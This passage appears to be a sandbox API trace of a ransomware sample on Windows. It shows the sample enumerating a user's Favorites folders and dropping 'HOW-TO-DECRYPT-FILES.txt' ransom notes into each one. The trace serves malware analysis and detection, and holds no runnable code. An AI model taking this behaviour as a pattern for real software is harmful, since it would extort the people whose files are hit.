lpFindFileData=0x364560) returned 1 [0059.549] GetLastError () returned 0x5 [0059.550] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.550] GetLastError () returned 0x5 [0059.550] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.550] GetLastError () returned 0x5 [0059.550] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.550] GetLastError () returned 0x5 [0059.550] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.550] GetLastError () returned 0x12 [0059.550] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0059.550] SetErrorMode (uMode=0x0) returned 0x1 [0059.550] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites", lpFilePart=0x0) returned 0x1a [0059.550] GetLastError () returned 0x12 [0059.550] SetErrorMode (uMode=0x1) returned 0x0 [0059.550] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0059.551] GetLastError () returned 0x12 [0059.551] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.551] GetLastError () returned 0x12 [0059.551] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.551] GetLastError () returned 0x12 [0059.551] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.551] GetLastError () returned 0x12 [0059.551] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.551] GetLastError () returned 0x12 [0059.551] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.551] GetLastError () returned 0x12 [0059.551] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.551] GetLastError () returned 0x12 [0059.552] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.552] GetLastError () returned 0x12 [0059.552] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0059.552] SetErrorMode (uMode=0x0) returned 0x1 [0059.552] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\desktop.ini", lpFilePart=0x0) returned 0x26 [0059.552] GetLastError () returned 0x12 [0059.552] SetErrorMode (uMode=0x1) returned 0x0 [0059.552] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\desktop.ini" (normalized: "c:\\users\\eebsym5\\favorites\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1b8303c | out: lpFileInformation=0x1b8303c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec40e560, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0059.552] GetLastError () returned 0x12 [0059.552] SetErrorMode (uMode=0x0) returned 0x1 [0059.553] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0059.553] GetLastError () returned 0x12 [0059.553] SetErrorMode (uMode=0x1) returned 0x0 [0059.553] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.553] GetLastError () returned 0x0 [0059.553] GetFileType (hFile=0x184) returned 0x1 [0059.553] SetErrorMode (uMode=0x0) returned 0x1 [0059.553] GetFileType (hFile=0x184) returned 0x1 [0059.553] WriteFile (in: hFile=0x184, lpBuffer=0x1b9eef0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1b9eef0*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0059.554] GetLastError () returned 0x0 [0059.554] CloseHandle (hObject=0x184) returned 1 [0059.554] GetLastError () returned 0x0 [0059.554] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0059.554] GetLastError () returned 0x0 [0059.554] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0059.554] GetLastError () returned 0x0 [0059.554] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Links", lpFilePart=0x0) returned 0x20 [0059.554] GetLastError () returned 0x0 [0059.554] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.554] GetLastError () returned 0x0 [0059.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.554] GetLastError () returned 0x0 [0059.554] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Links", lpFilePart=0x0) returned 0x20 [0059.554] GetLastError () returned 0x0 [0059.554] SetErrorMode (uMode=0x1) returned 0x0 [0059.555] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0059.555] GetLastError () returned 0x0 [0059.555] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.555] GetLastError () returned 0x0 [0059.555] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.555] GetLastError () returned 0x0 [0059.555] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.555] GetLastError () returned 0x0 [0059.555] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.555] GetLastError () returned 0x0 [0059.555] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.555] GetLastError () returned 0x12 [0059.556] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0059.556] SetErrorMode (uMode=0x0) returned 0x1 [0059.556] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Links", lpFilePart=0x0) returned 0x20 [0059.556] GetLastError () returned 0x12 [0059.556] SetErrorMode (uMode=0x1) returned 0x0 [0059.556] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0059.556] GetLastError () returned 0x12 [0059.556] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.556] GetLastError () returned 0x12 [0059.556] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.556] GetLastError () returned 0x12 [0059.556] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.556] GetLastError () returned 0x12 [0059.556] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.556] GetLastError () returned 0x12 [0059.557] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.557] GetLastError () returned 0x12 [0059.557] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0059.557] SetErrorMode (uMode=0x0) returned 0x1 [0059.557] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Links\\desktop.ini", lpFilePart=0x0) returned 0x2c [0059.557] GetLastError () returned 0x12 [0059.557] SetErrorMode (uMode=0x1) returned 0x0 [0059.557] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\eebsym5\\favorites\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ba212c | out: lpFileInformation=0x1ba212c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x78028160, ftLastWriteTime.dwHighDateTime=0x1d2f584, nFileSizeHigh=0x0, nFileSizeLow=0x50)) returned 1 [0059.557] GetLastError () returned 0x12 [0059.557] SetErrorMode (uMode=0x0) returned 0x1 [0059.558] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0059.558] GetLastError () returned 0x12 [0059.558] SetErrorMode (uMode=0x1) returned 0x0 [0059.558] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\links\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.559] GetLastError () returned 0x0 [0059.559] GetFileType (hFile=0x184) returned 0x1 [0059.559] SetErrorMode (uMode=0x0) returned 0x1 [0059.559] GetFileType (hFile=0x184) returned 0x1 [0059.559] WriteFile (in: hFile=0x184, lpBuffer=0x1bbdff8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1bbdff8*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0059.560] GetLastError () returned 0x0 [0059.560] CloseHandle (hObject=0x184) returned 1 [0059.560] GetLastError () returned 0x0 [0059.560] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0059.560] GetLastError () returned 0x0 [0059.560] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0059.561] GetLastError () returned 0x0 [0059.561] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\Suggested Sites.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Links\\Suggested Sites.url", lpFilePart=0x0) returned 0x34 [0059.561] GetLastError () returned 0x0 [0059.561] SetErrorMode (uMode=0x1) returned 0x0 [0059.561] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\eebsym5\\favorites\\links\\suggested sites.url"), fInfoLevelId=0x0, lpFileInformation=0x1bbfc8c | out: lpFileInformation=0x1bbfc8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cfe16b0, ftCreationTime.dwHighDateTime=0x1d2da19, ftLastAccessTime.dwLowDateTime=0x7cfe16b0, ftLastAccessTime.dwHighDateTime=0x1d2da19, ftLastWriteTime.dwLowDateTime=0x7d3737b0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xec)) returned 1 [0059.561] GetLastError () returned 0x0 [0059.561] SetErrorMode (uMode=0x0) returned 0x1 [0059.562] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0059.562] GetLastError () returned 0x0 [0059.562] SetErrorMode (uMode=0x1) returned 0x0 [0059.562] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\links\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.562] GetLastError () returned 0x5 [0059.563] SetErrorMode (uMode=0x0) returned 0x1 [0059.563] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\Web Slice Gallery.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Links\\Web Slice Gallery.url", lpFilePart=0x0) returned 0x36 [0059.563] GetLastError () returned 0x5 [0059.563] SetErrorMode (uMode=0x1) returned 0x0 [0059.563] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\eebsym5\\favorites\\links\\web slice gallery.url"), fInfoLevelId=0x0, lpFileInformation=0x1bddcf4 | out: lpFileInformation=0x1bddcf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd3a0830, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0xe2)) returned 1 [0059.564] GetLastError () returned 0x5 [0059.564] SetErrorMode (uMode=0x0) returned 0x1 [0059.564] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0059.564] GetLastError () returned 0x5 [0059.564] SetErrorMode (uMode=0x1) returned 0x0 [0059.564] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\links\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.564] GetLastError () returned 0x5 [0059.566] SetErrorMode (uMode=0x0) returned 0x1 [0059.566] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites", lpFilePart=0x0) returned 0x2d [0059.566] GetLastError () returned 0x5 [0059.566] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.566] GetLastError () returned 0x5 [0059.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.566] GetLastError () returned 0x5 [0059.566] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites", lpFilePart=0x0) returned 0x2d [0059.566] GetLastError () returned 0x5 [0059.566] SetErrorMode (uMode=0x1) returned 0x0 [0059.566] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0059.574] GetLastError () returned 0x5 [0059.574] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.574] GetLastError () returned 0x5 [0059.575] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.575] GetLastError () returned 0x5 [0059.575] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.575] GetLastError () returned 0x5 [0059.575] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.575] GetLastError () returned 0x5 [0059.575] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.575] GetLastError () returned 0x5 [0059.575] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.575] GetLastError () returned 0x5 [0059.575] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.575] GetLastError () returned 0x12 [0059.576] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0059.576] SetErrorMode (uMode=0x0) returned 0x1 [0059.576] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites", lpFilePart=0x0) returned 0x2d [0059.576] GetLastError () returned 0x12 [0059.576] SetErrorMode (uMode=0x1) returned 0x0 [0059.577] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0059.577] GetLastError () returned 0x12 [0059.577] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.577] GetLastError () returned 0x12 [0059.578] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.578] GetLastError () returned 0x12 [0059.578] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.578] GetLastError () returned 0x12 [0059.578] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.578] GetLastError () returned 0x12 [0059.578] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.578] GetLastError () returned 0x12 [0059.578] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.578] GetLastError () returned 0x12 [0059.578] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.578] GetLastError () returned 0x12 [0059.578] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0059.579] SetErrorMode (uMode=0x0) returned 0x1 [0059.579] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\IE Add-on site.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\IE Add-on site.url", lpFilePart=0x0) returned 0x40 [0059.579] GetLastError () returned 0x12 [0059.579] SetErrorMode (uMode=0x1) returned 0x0 [0059.579] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\eebsym5\\favorites\\microsoft websites\\ie add-on site.url"), fInfoLevelId=0x0, lpFileInformation=0x1bfd8bc | out: lpFileInformation=0x1bfd8bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2bbff0, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.580] GetLastError () returned 0x12 [0059.580] SetErrorMode (uMode=0x0) returned 0x1 [0059.580] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0059.580] GetLastError () returned 0x12 [0059.580] SetErrorMode (uMode=0x1) returned 0x0 [0059.580] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\microsoft websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.581] GetLastError () returned 0x0 [0059.581] GetFileType (hFile=0x184) returned 0x1 [0059.581] SetErrorMode (uMode=0x0) returned 0x1 [0059.581] GetFileType (hFile=0x184) returned 0x1 [0059.581] WriteFile (in: hFile=0x184, lpBuffer=0x1c19300*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1c19300*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0059.582] GetLastError () returned 0x0 [0059.582] CloseHandle (hObject=0x184) returned 1 [0059.582] GetLastError () returned 0x0 [0059.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0059.582] GetLastError () returned 0x0 [0059.582] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0059.582] GetLastError () returned 0x0 [0059.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", lpFilePart=0x0) returned 0x4a [0059.582] GetLastError () returned 0x0 [0059.582] SetErrorMode (uMode=0x1) returned 0x0 [0059.582] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\eebsym5\\favorites\\microsoft websites\\ie site on microsoft.com.url"), fInfoLevelId=0x0, lpFileInformation=0x1c1afcc | out: lpFileInformation=0x1c1afcc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2bbff0, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.583] GetLastError () returned 0x0 [0059.583] SetErrorMode (uMode=0x0) returned 0x1 [0059.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0059.583] GetLastError () returned 0x0 [0059.583] SetErrorMode (uMode=0x1) returned 0x0 [0059.583] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\microsoft websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.583] GetLastError () returned 0x5 [0059.584] SetErrorMode (uMode=0x0) returned 0x1 [0059.584] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\Microsoft At Home.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\Microsoft At Home.url", lpFilePart=0x0) returned 0x43 [0059.584] GetLastError () returned 0x5 [0059.584] SetErrorMode (uMode=0x1) returned 0x0 [0059.584] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\eebsym5\\favorites\\microsoft websites\\microsoft at home.url"), fInfoLevelId=0x0, lpFileInformation=0x1c38bec | out: lpFileInformation=0x1c38bec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x903b950, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x903b950, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2bbff0, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.584] GetLastError () returned 0x5 [0059.584] SetErrorMode (uMode=0x0) returned 0x1 [0059.584] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0059.584] GetLastError () returned 0x5 [0059.584] SetErrorMode (uMode=0x1) returned 0x0 [0059.584] CreateFileW 